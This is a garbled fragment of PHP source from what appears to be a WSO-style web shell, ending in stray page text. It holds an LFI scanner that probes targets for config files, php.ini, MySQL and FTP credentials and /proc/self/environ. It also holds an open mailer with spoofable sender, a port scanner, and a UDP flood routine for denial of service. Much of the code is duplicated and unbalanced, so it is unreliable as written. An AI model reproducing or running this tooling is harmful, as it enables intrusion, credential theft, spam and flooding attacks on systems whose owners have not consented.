"; while($lfiaccess[$x]) { $res3 = FetchURL($target.$lfiaccess[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiaccess[$x]."
"; } else { print "".$target."".$lfiaccess[$x]."
"; } else { print "[!] Failed!".$target."".$lfiaccess[$x]."
"; } $x++; } } } if ( $type == 2 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lficonfig[$x]) { $res3 = FetchURL($target.$lficonfig[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lficonfig[$x]) { $res3 = FetchURL($target.$lficonfig[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lficonfig[$x]."
"; } else { print "".$target."".$lficonfig[$x]."
"; } else { print "[!] Failed!".$target."".$lficonfig[$x]."
"; } $x++; } } } if ( $type == 3 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfierror[$x]) { $res3 = FetchURL($target.$lfierror[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfierror[$x]) { $res3 = FetchURL($target.$lfierror[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfierror[$x]."
"; } else { print "".$target."".$lfierror[$x]."
"; } else { print "[!] Failed!".$target."".$lfierror[$x]."
"; } $x++; } } } if ( $type == 4 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiphpini[$x]) { $res3 = FetchURL($target.$lfiphpini[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfiphpini[$x]) { $res3 = FetchURL($target.$lfiphpini[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiphpini[$x]."
"; } else { print "".$target."".$lfiphpini[$x]."
"; } else { print "[!] Failed!".$target."".$lfiphpini[$x]."
"; } $x++; } } } if ( $type == 5 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfimysql[$x]) { $res3 = FetchURL($target.$lfimysql[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfimysql[$x]) { $res3 = FetchURL($target.$lfimysql[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfimysql[$x]."
"; } else { print "".$target."".$lfimysql[$x]."
"; } else { print "[!] Failed!".$target."".$lfimysql[$x]."
"; } $x++; } } } if ( $type == 6 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiftp[$x]) { $res3 = FetchURL($target.$lfiftp[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfiftp[$x]) { $res3 = FetchURL($target.$lfiftp[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiftp[$x]."
"; } else { print "".$target."".$lfiftp[$x]."
"; } else { print "[!] Failed!".$target."".$lfiftp[$x]."
"; } $x++; } } } if ( $type == 7 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
";{ $res3 = FetchURL($target.$lfiprocenv); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
";{ $res3 = FetchURL($target.$lfiprocenv); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiprocenv."
"; } else { print "".$target."".$lfiprocenv."
"; } else { print "[!] Failed!".$target."".$lfiprocenv."
"; } } } } } wsoFooter(); } function actionphptools() { wsoHeader(); ?>
Mailer




'; if (isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])) { $headers = 'From: '.$_POST['from']; mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers); echo 'Email sent.'; } //port scanner echo '
Port Scanner
'; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is open
'; } flush(); } }else{ ?>
Host:

Port start:

Port end:

"; $max_time = $time+$exec_time; $host = $_POST['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "
UDP Flood
Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second n"; echo '

Host: Length (seconds):
'; }else{ echo '
UDP Flood
Host:

Length (seconds):

'; } ?>
PHP info
'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('

Back to Main Gallery